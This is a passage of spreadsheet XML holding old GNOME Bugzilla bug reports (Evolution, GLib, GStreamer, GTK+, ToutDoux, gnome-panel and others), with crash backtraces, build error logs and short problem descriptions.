#6  0x4103b771 in abort () from /lib/tls/libc.so.6
No symbol table info available.
#7  0x00000000 in ?? ()
No symbol table info available.
#8  0x00000020 in ?? ()
No symbol table info available.
#9  0x00000000 in ?? ()
No symbol table info available.
#10 0x00000000 in ?? ()
No symbol table info available.
#11 0x00000000 in ?? ()
No symbol table info available.
#12 0x00000000 in ?? ()
No symbol table info available.
#13 0x00000000 in ?? ()
No symbol table info available.
#14 0x00000000 in ?? ()
No symbol table info available.
#15 0x00000000 in ?? ()
No symbol table info available.
#16 0x00000000 in ?? ()
No symbol table info available.
#17 0x00000000 in ?? ()
No symbol table info available.
#18 0x00000000 in ?? ()
No symbol table info available.
#19 0x00000000 in ?? ()
No symbol table info available.
#20 0x00000000 in ?? ()
No symbol table info available.
#21 0x00000000 in ?? ()
No symbol table info available.
#22 0x00000000 in ?? ()
No symbol table info available.
#23 0x00000000 in ?? ()
No symbol table info available.
#24 0x00000000 in ?? ()
No symbol table info available.
#25 0x00000000 in ?? ()
No symbol table info available.
#26 0x00000000 in ?? ()
No symbol table info available.
#27 0x00000000 in ?? ()
No symbol table info available.
#28 0x00000000 in ?? ()
No symbol table info available.
#29 0x00000000 in ?? ()
No symbol table info available.
#30 0x00000000 in ?? ()
No symbol table info available.
#31 0x00000000 in ?? ()
No symbol table info available.
#32 0x00000000 in ?? ()
No symbol table info available.
#33 0x00000000 in ?? ()
No symbol table info available.
#34 0x00000000 in ?? ()
No symbol table info available.
#35 0x00000000 in ?? ()
No symbol table info available.
#36 0x00000000 in ?? ()
No symbol table info available.
#37 0x00000000 in ?? ()
No symbol table info available.
#38 0x00000000 in ?? ()
No symbol table info available.
#39 0x00000000 in ?? ()
No symbol table info available.
#40 0x00000000 in ?? ()
No symbol table info available.
#41 0x0f65aae5 in ?? ()
No symbol table info available.
#42 0x400cb270 in ?? ()
No symbol table info available.
#43 0x40113bc7 in ?? () from /usr/lib/libecal.so.6
No symbol table info available.
#44 0x00000000 in ?? ()
No symbol table info available.
#45 0x00000001 in ?? ()
No symbol table info available.
#46 0x0000000b in ?? ()
No symbol table info available.
#47 0xbfffef14 in ?? ()
No symbol table info available.
#48 0x4010a408 in ?? () from /usr/lib/libecal.so.6
No symbol table info available.
#49 0x400cb270 in ?? ()
No symbol table info available.
#50 0x40016c00 in ?? () from /lib/ld-linux.so.2
No symbol table info available.
#51 0x00008dd3 in ?? ()
No symbol table info available.
#52 0x400cb270 in ?? ()
No symbol table info available.
#53 0xbfffef40 in ?? ()
No symbol table info available.
#54 0x4000ba16 in _dl_map_object_deps () from /lib/ld-linux.so.2
No symbol table info available.
#55 0x40136ad0 in e_cal_component_set_due () from /usr/lib/libecal.so.6
No symbol table info available.
#56 0x40139129 in e_cal_component_set_rdate_list () from
/usr/lib/libecal.so.6
No symbol table info available.
#57 0x41ab1dac in recurrence_page_get_type ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#58 0x41ab21c7 in recurrence_page_get_type ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#59 0x41ab4906 in recurrence_page_get_type ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#60 0x41ab3b8b in recurrence_page_get_type ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#61 0x41aa5164 in comp_editor_page_fill_widgets ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#62 0x41aa32bc in comp_editor_get_e_cal ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#63 0x41aa36f9 in comp_editor_get_e_cal ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#64 0x41aa8a3f in event_editor_construct ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#65 0x41aa3aef in comp_editor_edit_comp ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#66 0x41a2f83e in e_calendar_view_edit_appointment ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#67 0x41a463fe in e_day_view_convert_time_to_position ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#68 0x41a45a28 in e_day_view_convert_time_to_position ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#69 0x41a4550c in e_day_view_convert_time_to_position ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#70 0x40b67934 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#71 0x40f58c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#72 0x40f6cc25 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#73 0x40f6b9be in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#74 0x40f6bee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#75 0x40c66957 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#76 0x40b65ed2 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#77 0x40b64c26 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#78 0x40e80185 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#79 0x40fb4b92 in g_main_depth () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#80 0x40fb5c88 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#81 0x40fb5fc0 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#82 0x40fb6603 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#83 0x407523c8 in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#84 0x0806677e in main ()
No symbol table info available.
#0  0x40e27431 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>tlau-ximian</t>
  </si>
  <si>
    <t>GLIB-362918</t>
  </si>
  <si>
    <t>monotonic clock test uses AC_TRY_RUN</t>
  </si>
  <si>
    <t>Please describe the problem:
Hi
configure.in says
AC_TRY_RUN([
#include 
#ifdef HAVE_UNISTD_H
#include 
#endif
      int main() {
#if defined(_POSIX_MONOTONIC_CLOCK) &amp;&amp; _POSIX_MONOTONIC_CLOCK &gt;= 0 &amp;&amp; defined(CLOCK_MONOTONIC)
        return 0
#else
        return 1
#endif
      }]glib_cv_monotonic_clock=yesglib_cv_monotonic_clock=no))
this breaks with cross-compiles. CPP symbols can (and should) be detected without running the program. 
Ac_TRY_COMPILE(
#ifdef CHECK_SYM
  #error
#endif
)
is a more reliable way of checking CPP symbols. 
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GSTREAMER-321875</t>
  </si>
  <si>
    <t>gst_plugin_check_file disappeared</t>
  </si>
  <si>
    <t>In revision 1.143 of gstplugin.c gst_plugin_check_file was removed:
http://cvs.freedesktop.org/gstreamer/gstreamer/gst/gstplugin.c?r1=1.142&amp;r2=1.143
It's still prototyped in the header so why did it have to die?  The attached
(untested) patch it's it and a helper back.</t>
  </si>
  <si>
    <t>GTKHTML-270869</t>
  </si>
  <si>
    <t>On printout box appears to strike through text</t>
  </si>
  <si>
    <t>Attaching shot of 2.0.3.  On the left of the screen is the print preview
screen which is exactly what prints.  The box that appears around the text
is striking through the last line of the body.  The right contains the
original message as it apppears in Evolution which is correct.</t>
  </si>
  <si>
    <t>GNOME-VFS-168203</t>
  </si>
  <si>
    <t>[PATCH] Add support for the FreeBSD SSH</t>
  </si>
  <si>
    <t>Please describe the problem:
Attached are patches that fix three problems in gnome-vfs.
The first checks to see that the lagacy EAI_ADDRFAMILY and EAI_NODATA macros are
defined before using them.  They have been obsoleted in FreeBSD 5.X and later.
The second adds support for the FreeBSD SSH password: and Password: (note
the lack of a trailing space) prompts.
The third fixes a build issue with GCC 2.95.x by removing a redundant semi-colon.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>TOTEM-158559</t>
  </si>
  <si>
    <t>Totem should accept drag and drop of URL's from Mozilla</t>
  </si>
  <si>
    <t>Go to http://mirror.fluendo.com/cortado webpage and try and drag the URL for the
direct player stream onto totem.</t>
  </si>
  <si>
    <t>RHYTHMBOX-321416</t>
  </si>
  <si>
    <t>g_propagate_error message when playing radio stream</t>
  </si>
  <si>
    <t>Whenever I start playing a radio stream I get this:
(rhythmbox:2629): GLib-CRITICAL **: g_propagate_error: assertion `src != NULL'
failed
because the 'else if' clause starting at line 1003 of rb-shell-player.c uses ||
rather than &amp;&amp; - it should only try to propagate the error if
totem_pl_parser_parse returned an error and there's somewhere to propagate it to.
'error' will always be non-NULL at this point.</t>
  </si>
  <si>
    <t>INTLTOOL-159511</t>
  </si>
  <si>
    <t>recent change to intltool-merge.in.in breaks GOK xam file generation</t>
  </si>
  <si>
    <t>Using intltool with intltool-merge.in.in cvs file version 1.104 or later build
gok. _GOK should not appear in any generated *.xam file but does.  In fact the
*.xam files become quite borked. This is very bad for gok and any other projects
that might use a similar xml translation technique.
This change introduces the problem for gok:
dtb@otter:~/code/intltool-32/intltool&gt; cvs diff -u -r 1.104 intltool-merge.in.in 
Enter passphrase for key '/home/dtb/.ssh/id_rsa': 
Index: intltool-merge.in.in
===================================================================
RCS file: /cvs/gnome/intltool/intltool-merge.in.inv
retrieving revision 1.104
retrieving revision 1.103
diff -u -r1.104 -r1.103
--- intltool-merge.in.in        5 Nov 2004 10:35:12 -0000       1.104
+++ intltool-merge.in.in        23 Oct 2004 09:30:33 -0000      1.103
@@ -64311 +6438 @@
                if ($translation) {
                    $translation = entity_encode($translation)
                    $string = $translation
-                    $$translate = 2
                }
-            } else {
-                 $$translate = 1 if ($translate  # watch not
to overwrite if $translate == 2
-            }
+           }
        }
        $result .=  $key=$quote$string$quote
dtb@otter:~/code/intltool-32/intltool&gt; 
(or see 
http://cvs.gnome.org/viewcvs/intltool/intltool-merge.in.in?r1=1.103&amp;r2=1.104)
Sorry I can't offer a solution. gok is a module in gnome cvs. If you have any
questions about reproducing this please ask here or email me.</t>
  </si>
  <si>
    <t>JHBUILD-102394</t>
  </si>
  <si>
    <t>acme depends upon libegg</t>
  </si>
  <si>
    <t>gcc -DHAVE_CONFIG_H -I. -I. -I.. -DORBIT2=1 -pthread
-I/gnome/head/INSTALL/include/libgnomeui-2.0
-I/gnome/head/INSTALL/include/libgnome-2.0
-I/gnome/head/INSTALL/include/libgnomecanvas-2.0
-I/gnome/head/INSTALL/include/gtk-2.0
-I/gnome/head/INSTALL/include/libart-2.0
-I/gnome/head/INSTALL/include/gconf/2
-I/gnome/head/INSTALL/include/libbonoboui-2.0
-I/gnome/head/INSTALL/include/glib-2.0
-I/gnome/head/INSTALL/lib/glib-2.0/include
-I/gnome/head/INSTALL/include/orbit-2.0
-I/gnome/head/INSTALL/include/libbonobo-2.0
-I/gnome/head/INSTALL/include/gnome-vfs-2.0
-I/gnome/head/INSTALL/lib/gnome-vfs-2.0/include
-I/gnome/head/INSTALL/include/linc-1.0
-I/gnome/head/INSTALL/include/bonobo-activation-2.0
-I/gnome/head/INSTALL/include/pango-1.0 -I/gnome/head/INSTALL/include
-I/usr/X11R6/include/freetype2 -I/gnome/head/INSTALL/lib/gtk-2.0/include
-I/gnome/head/INSTALL/include/atk-1.0 -I/usr/X11R6/include
-I/gnome/head/INSTALL/include/libxml2
-I/gnome/head/INSTALL/include/libglade-2.0
-I/gnome/head/INSTALL/include/libwnck-1.0  					 -DHAVE_OSS -DHAVE_FB	
-DACME_DATA=\/gnome/head/INSTALL/share/acme/\		
-DGNOMELOCALEDIR=\/gnome/head/INSTALL/share/locale\        
-DWNCK_I_KNOW_THIS_IS_UNSTABLE				-DG_DISABLE_DEPRECATED
-DGDK_DISABLE_DEPRECATED		-DGTK_DISABLE_DEPRECATED
-DGNOME_DISABLE_DEPRECATED    -g -O2 -c g-volume.c
EGGFILES=eggcellrendererkeys.c eggcellrendererkeys.h eggaccelerators.h
eggaccelerators.c EGGDIR=./../../libegg/libegg/treeviewutils/
./update-from-egg.sh
cp: cannot stat
`./../../libegg/libegg/treeviewutils//eggcellrendererkeys.c': No such file
or directory
Could not move ./../../libegg/libegg/treeviewutils//eggcellrendererkeys.c
to eggcellrendererkeys.c
make[2]: *** [regenerate-built-sources] Error 1
make[2]: Leaving directory `/gnome/head/cvs/acme/src'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/gnome/head/cvs/acme'
make: *** [all-recursive-am] Error 2
*** error during stage build of acme: could not build module *** [83/132]</t>
  </si>
  <si>
    <t>GTK+-646500</t>
  </si>
  <si>
    <t>GTK+ 3.1 causes terminals to start up with 0 height</t>
  </si>
  <si>
    <t>Created attachment 184920
screenshot of terminal with GTK+ 3.0.7
Reverting to 3.0.6 fixes this.</t>
  </si>
  <si>
    <t>GNOME-MENUS-304129</t>
  </si>
  <si>
    <t>gnome-menus should support uninstalled pc file</t>
  </si>
  <si>
    <t>Attached find a patch that creates an uninstalled.pc file for gnome-menus.  It
would be nice to support building without needing to have gnome-menus installed.
 The attached patch does not add the uninstalled.pc file to EXTRA_DIST in the
Makefile.am but whoever commits the patch can make this minor change.</t>
  </si>
  <si>
    <t>GSTREAMER-105256</t>
  </si>
  <si>
    <t>[0.6 branch candidate] gst-register doesn't work when a bad DISPLAY is set</t>
  </si>
  <si>
    <t>gst-register seems to check the DISPLAY for some reason when running.  So
something like:
DISPLAY=cnn.com:0 gst-register
Will cause it to error out eventually.  As the display doesn't seem to be
needed at all it should be ignored.</t>
  </si>
  <si>
    <t>LIBGNOMEKBD-353163</t>
  </si>
  <si>
    <t>LIBGNOMEKBD</t>
  </si>
  <si>
    <t>layout not redrawing properly</t>
  </si>
  <si>
    <t>when keys are pressed libkbdraw just redraws the pressed button possibly 
overdrawing overlapping doodads. This can be seen e.g. with the Thinkpad layouts
when pressing the g h b keys.</t>
  </si>
  <si>
    <t>libgnomekbd-maint</t>
  </si>
  <si>
    <t>GNOME-PYTHON-DESKTOP-168057</t>
  </si>
  <si>
    <t>Missing threads unblocking in _wrap_panel_applet_factory_main_closure</t>
  </si>
  <si>
    <t>_wrap_panel__applet_bonobo_factory calls
_wrap_panel_applet_factory_main_closure which blocks in a main loop without
unblocking threads.  Thus threads are not allowed to acquired the GIL.</t>
  </si>
  <si>
    <t>LIBGDA-77051</t>
  </si>
  <si>
    <t>XML provider</t>
  </si>
  <si>
    <t>Implement new schemas in default provider</t>
  </si>
  <si>
    <t>PAN-345867</t>
  </si>
  <si>
    <t>hyperlinks not passed to browser correctly</t>
  </si>
  <si>
    <t>Please describe the problem:
with the BROWSER environment variable set to either firefox or seamonkey clicking on a link in an article sends the http:/ incorrectly i think.  the first slash is normal text and the second is in italics. i get this.
Firefox can't find the file at /www.imdb.com/title/tt0395478.
i just got it to work with one file in the cache but other than that one time the link hasn't been passed correctly
Steps to reproduce:
1. click on hyperlink in article
2. browser opens with data like  /www.imdb.com/title/tt0395478
3. 
Actual results:
Expected results:
Does this happen every time?
not every time but usually.
Other information:
this is with the .101 version released yesterday.</t>
  </si>
  <si>
    <t>whansard</t>
  </si>
  <si>
    <t>MLVIEW-132756</t>
  </si>
  <si>
    <t>Repeated attributes</t>
  </si>
  <si>
    <t>It is possible to add the same attribute many times to the same element. It
should not.
The application should test if the attribute is already present and not add
it if one is there.</t>
  </si>
  <si>
    <t>axolotl</t>
  </si>
  <si>
    <t>GTKHTML-313014</t>
  </si>
  <si>
    <t>Font size -2 -1 are not working from the Format menu.</t>
  </si>
  <si>
    <t>Please describe the problem:
Steps to reproduce:
1) Click on the Format menu.
2) Select Font Size -&gt; -2.
3) Type some text.
Actual results:
The text still appears in the default font size.
Expected results:
The -2 -1 font size should work.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>BANSHEE-320850</t>
  </si>
  <si>
    <t>Banshee fails to start</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. start banshee (on my system)
2. 
3. 
Stack trace:
sh-3.00$ banshee
0: Active Player Engine is now 'GStreamer'
1: Loaded PlayerEngine core: GStreamer
2: Loaded AudioCdPlayerEngine core: GStreamer
3: Audio CD Core Initialized
System.ApplicationException: Invalid track count from TOC
in  MusicBrainz.SimpleDisc:ReadCDToc ()
in  MusicBrainz.SimpleDisc:.ctor (System.String device
MusicBrainz.Client client)
in  MusicBrainz.SimpleDisc:.ctor (System.String device)
in  Banshee.AudioCdDisk:LoadDiskInfo ()
in  Banshee.AudioCdDisk:.ctor (Banshee.DiskInfo disk)
in  Banshee.AudioCdCore:BuildInitialList ()
in  Banshee.AudioCdCore:.ctor ()
in  Banshee.Core:.ctor ()
in  Banshee.Core:get_Instance ()
in  Banshee.BansheeEntry:Startup (System.String[] args)
in  Banshee.BansheeEntry:Main (System.String[] args)
Other information:</t>
  </si>
  <si>
    <t>rich.kowalczyk</t>
  </si>
  <si>
    <t>NETWORKMANAGER-446308</t>
  </si>
  <si>
    <t>VPN: vpnc</t>
  </si>
  <si>
    <t>minor properties dialogue issue</t>
  </si>
  <si>
    <t>The new Disable NAT _Traveral checkbox has the wrong capitalisation (should be Disable NAT traversal). Also it's not very elegant to have a checkbox to check to disable can't this be formulated positively Enable _NAT traversal ?</t>
  </si>
  <si>
    <t>EVOLUTION-207336</t>
  </si>
  <si>
    <t>Crash with locked imap mailbox</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: P3
Version: 0.12.99
Synopsis: Crash with locked imap mailbox
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Evolution crashed when attempting to access a mailbox on an IMAP server which was locked by a client on another computer.
Unknown priority P3. Setting to default priority Normal.
Unknown reporter: robin@a1.nl changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>GTK+-88126</t>
  </si>
  <si>
    <t>gtk_widget_set_sensitive() doesn't change appearance of GtkTextView</t>
  </si>
  <si>
    <t>When I call gtk_widget_set_sensitive() on a GtkTextView before it is shown
it works correctly so the text view will be either white or greyed out
depending on whether it's sensitive or not.
However if I change the sensitivity later after the text view has been
shown the appearance doesn't change. gtk_widget_set_sensitive() correctly
changes the state of the text view so that I can/cannot enter text but
the color remains the same...</t>
  </si>
  <si>
    <t>bugcreator</t>
  </si>
  <si>
    <t>ATK-382328</t>
  </si>
  <si>
    <t>fix compile warnings about const</t>
  </si>
  <si>
    <t>Add a missing |const| in some places.</t>
  </si>
  <si>
    <t>TOUTDOUX-55582</t>
  </si>
  <si>
    <t>TOUTDOUX</t>
  </si>
  <si>
    <t>toutdoux CVS 2001/06/01</t>
  </si>
  <si>
    <t xml:space="preserve">Package: ToutDoux
Severity: critical
Version: 1.2.7 prerelease
Synopsis: toutdoux CVS 2001/06/01
Bugzilla-Product: ToutDoux
Bugzilla-Component: general
Description:
open aide -&gt; personnaliser
*CRASH*
/////////////
DÃ©marrage : dÃ©but
Loading customize : application.category 'app.session' not found : Ã©chouÃ©(e)
Loading customize : application.category 'app.development' not found : Ã©chouÃ©(e)
Loading customize : application.category 'app.development' not found : Ã©chouÃ©(e)
Loading customize : application.category 'app.development' not found : Ã©chouÃ©(e)
Loading customize : application.category 'app.development' not found : Ã©chouÃ©(e)
Loading customize : application.category 'app.development' not found : Ã©chouÃ©(e)
Loading customize : application.category 'app.development' not found : Ã©chouÃ©(e)
Executing plug-in : file '/usr/lib/toutdoux/plugins/libhelp_bookmarks.so' : symb                                            ol 'plugins_start' : greffons
Chargement des signets : dÃ©but
Chargement fichier '/home/moa/.toutdoux/bookmarks.xml' : rÃ©ussie
Chargement du fichier support '/home/moa/.toutdoux/bookmarks.xml' : rÃ©ussie
Chargement des signets : fin
Executing plug-in : file '/usr/lib/toutdoux/plugins/libhelp_bookmarks.so' : symb                                                                                   ol 'plugins_menu_def_templates' : greffons
Executing plug-in : file '/usr/lib/toutdoux/plugins/libhelp_bookmarks.so' : symb                                                                                   ol 'plugins_menu_def_history' : greffons
Executing plug-in : file '/usr/lib/toutdoux/plugins/libhelp_bookmarks.so' : symb                                                                                   ol 'plugins_menu_def_favorites' : greffons
CREATE DATABASE
[moa@chaos moa]$ toutdoux
DÃ©marrage : dÃ©but
Loading customize : application.category 'app.session' not found : Ã©chouÃ©(e)
Loading customize : application.category 'app.development' not found : Ã©chouÃ©(e)
Loading customize : application.category 'app.development' not found : Ã©chouÃ©(e)
Loading customize : application.category 'app.development' not found : Ã©chouÃ©(e)
Loading customize : application.category 'app.development' not found : Ã©chouÃ©(e)
Loading customize : application.category 'app.development' not found : Ã©chouÃ©(e)
Loading customize : application.category 'app.development' not found : Ã©chouÃ©(e)
Executing plug-in : file '/usr/lib/toutdoux/plugins/libhelp_bookmarks.so' : symb                                                                                   ol 'plugins_start' : greffons
Chargement des signets : dÃ©but
Chargement fichier '/home/moa/.toutdoux/bookmarks.xml' : rÃ©ussie
Chargement du fichier support '/home/moa/.toutdoux/bookmarks.xml' : rÃ©ussie
Chargement des signets : fin
Executing plug-in : file '/usr/lib/toutdoux/plugins/libhelp_bookmarks.so' : symb                                                                                   ol 'plugins_menu_def_templates' : greffons
Executing plug-in : file '/usr/lib/toutdoux/plugins/libhelp_bookmarks.so' : symb                                                                                   ol 'plugins_menu_def_history' : greffons
Executing plug-in : file '/usr/lib/toutdoux/plugins/libhelp_bookmarks.so' : symb                                                                                   ol 'plugins_menu_def_favorites' : greffons
ERROR:  CREATE DATABASE: database toutdoux already exists
createdb: database creation failed
DROP DATABASE
CREATE DATABASE
** CRITICAL **: file gdk-pixbuf-scale.c: line 215 (gdk_pixbuf_scale_simple): ass                                                                                   ertion `src != NULL' failed.
** CRITICAL **: file gdk-pixbuf.c: line 78 (gdk_pixbuf_unref): assertion `pixbuf                                                                                    != NULL' failed.
/home/moa/15599: No such file or directory.
659     gnome-init.c: No such file or directory.
41      eval.c: No such file or directory.
Debugging Information:
(no debugging symbols found)...0x4062e519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x4062e519 in __wait4 () from /lib/i686/libc.so.6
#1  0x4069e9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x401fbd36 in gnome_segv_handle (signum=11) at gnome-init.c:659
#3  
#4  load_file (mod=0x81245e0 
    file=0x81437a0 /home/moa/.toutdoux/customize/app.xml) at main.c:393
#5  0x40832c60 in plugins_create (mod=0x81245e0) at main.c:226
#6  0x40083337 in td_app_custom_show (app=0x80aba50) at td_app.c:844
#7  0x804c9ce in customize_show () at eval.c:41
#8  0x4033ca03 in gtk_marshal_NONE__NONE (object=0x80cec5c 
    func=0x804c9ac  func_data=0x0 args=0xbffff120)
    at gtkmarshal.c:312
#9  0x4036bff2 in gtk_handlers_run (handlers=0x80dbe68 signal=0xbffff0c0 
    object=0x80cec5c params=0xbffff120 after=0) at gtksignal.c:1917
#10 0x4036b453 in gtk_signal_real_emit (object=0x80cec5c signal_id=75 
    params=0xbffff120) at gtksignal.c:1477
#11 0x403694c8 in gtk_signal_emit (object=0x80cec5c signal_id=75)
    at gtksignal.c:552
#12 0x4039f6e4 in gtk_widget_activate (widget=0x80cec5c) at gtkwidget.c:2890
#13 0x40344d29 in gtk_menu_shell_activate_item (menu_shell=0x80d9460 
    menu_item=0x80cec5c force_deactivate=1) at gtkmenushell.c:859
#14 0x40343fb9 in gtk_menu_shell_button_release (widget=0x80d9460 
    event=0x80e5cb8) at gtkmenushell.c:486
#15 0x4033c7d9 in gtk_marshal_BOOL__POINTER (object=0x80d9460 
    func=0x40343e2c  func_data=0x0 
    args=0xbffff4f0) at gtkmarshal.c:28
#16 0x4036b493 in gtk_signal_real_emit (object=0x80d9460 signal_id=27 
    params=0xbffff4f0) at gtksignal.c:1492
#17 0x403694c8 in gtk_signal_emit (object=0x80d9460 signal_id=27)
    at gtksignal.c:552
#18 0x4039f5b0 in gtk_widget_event (widget=0x80d9460 event=0x80e5cb8)
    at gtkwidget.c:2864
#19 0x4033c750 in gtk_propagate_event (widget=0x80cec5c event=0x80e5cb8)
    at gtkmain.c:1378
#20 0x4033b90d in gtk_main_do_event (event=0x80e5cb8) at gtkmain.c:818
#21 0x403e8e4f in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff8d0 user_data=0x0) at gdkevents.c:2139
#22 0x4054f15d in g_main_dispatch (dispatch_time=0xbffff8d0) at gmain.c:656
#23 0x4054f71d in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#24 0x4054f870 in g_main_run (loop=0x811e658) at gmain.c:935
#25 0x4033b213 in gtk_main () at gtkmain.c:524
#26 0x804c477 in main () at eval.c:41
#27 0x40590177 in __libc_start_main (main=0x804c240  argc=1 
    ubp_av=0xbffff9bc init=0x804a5bc  fini=0x804db90  
    rtld_fini=0x4000e184  stack_end=0xbffff9ac)
    at ../sysdeps/generic/libc-start.c:129
#0  0x4062e519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x4069e9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x401fbd36 in gnome_segv_handle (signum=11) at gnome-init.c:659
in_segv.5 = 1
pid = 0
estatus = 1077135632
buf = \001\000\000\000\001\000\001\000 Ã¿\n\b\000\000\000\0004Ã¬Ã¿Â¿\001\000\000\000Ã¸Ã¾&lt;@ Ã¬Ã¿Â¿
#3  
No locals.
#4  load_file (mod=0x81245e0 
    file=0x81437a0 /home/moa/.toutdoux/customize/app.xml) at main.c:393
393		  if (!strcmp (txt[2] yes))
__result = 0
flower = (GtkObject *) 0x8143750
list_ajusted = 0
node_list = (GList *) 0x8141498
menu_width = (gchar *) 0x0
menu_width2 = (gchar *) 0x0
menu_list = (GList *) 0x0
predef_list = (GList *) 0x0
predef2_list = (GList *) 0x0
txt = {0x8144db8 delay 0x8141178 Temporisation 0x0 0x40842ce5  
  0x40842c6c category}
seleted_value = (gchar *) 0x0
txt2 = {0x81452c0 Interface 0x8149b50 1}
i = 1
j = 135373216
k = 0
l = -1
custom_box0 = (GtkWidget *) 0x813a2dc
custom_box = (GtkWidget *) 0x813a2dc
custom_scrolledwindow = (GtkWidget *) 0x1
custom_viewport = (GtkWidget *) 0x813a2dc
custom_box2 = (GtkWidget *) 0x8144fd8
group_frame = (GtkWidget *) 0x813a2dc
box_tmp = (GtkWidget *) 0x400888f7
vbox_tmp = (GtkWidget *) 0x0
group_table = (GtkWidget *) 0x0
option_label = (GtkWidget *) 0x813a2dc
option_widget = (GtkWidget *) 0x0
option_menu = (GtkWidget *) 0x0
color_widget = (GtkWidget *) 0x813a2dc
font_widget = (GtkWidget *) 0x813a2dc
#5  0x40832c60 in plugins_create (mod=0x81245e0) at main.c:226
226	  load_file (mod NULL)
mod = (GtkObject *) 0x81245e0
#6  0x40083337 in td_app_custom_show (app=0x80aba50) at td_app.c:844
844		symbol (app-&gt;custom_browser)
app = (TdApp *) 0x80aba50
symbol = (void (*)()) 0xfffffe00
#7  0x804c9ce in customize_show () at eval.c:41
ap = (void **) 0x80dbe68
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x80cec5c  (\013\bÃŒ\a\001
result = 135118440
result = 135064668
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-06-01 12:21 -------
Unknown version 1.2.x in product ToutDoux. Setting version to the default unspecified.
The original reporter (moa@AStrasbourg-201-1-5-247.abo.wanadoo.fr) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component ph_roy@toutdoux.org.
</t>
  </si>
  <si>
    <t>ph_roy</t>
  </si>
  <si>
    <t>moa</t>
  </si>
  <si>
    <t>GNOME-PANEL-74145</t>
  </si>
  <si>
    <t>Crash after closing window list properties and trying to reopen them</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-panel
Severity: normal
Version: 1.5.12
Synopsis: Crash after closing window list properties and trying to reopen them
Bugzilla-Product: gnome-panel
Bugzilla-Component: Window List Applet
BugBuddy-GnomeVersion: 2.0 (1.112.1)
Description:
See backtrace.
Debugging Information:
[New Thread 1024 (LWP 6554)]
0x408f1ca9 in __wait4 () from /lib/i686/libc.so.6
#0  0x408f1ca9 in __wait4 () from /lib/i686/libc.so.6
#1  0x4096d6b4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4029c6f3 in waitpid (pid=8333 stat_loc=0xbfffdbbc options=0)
    at wrapsyscall.c:172
#3  0x40081ff9 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:598
#4  0x4029aa85 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 136382560 esi = 1086199112 ebp = 3221217176 esp
= 3221217120 ebx = 1081918452 edx = 137194200 ecx = 32 eax = 65650
trapno = 14 err = 4 eip = 1081851633 cs = 35 __csh = 0 eflags =
66054 esp_at_signal = 3221217120 ss = 43 __ssh = 0 fpstate =
0xbfffdce0 oldmask = 2147483648 cr2 = 65650})
    at signals.c:97
#5  
#6  g_type_check_instance_cast (type_instance=0x82d6ad8
iface_type=135232304)
    at gtype.c:2600
#7  0x40be15bf in display_properties_dialog (uic=0x820b838 
    tasklist=0x8210860 verbname=0x824e398 TasklistProperties)
    at tasklist.c:626
#8  0x4010b808 in marshal_VOID__USER_DATA_STRING (closure=0x820e058 
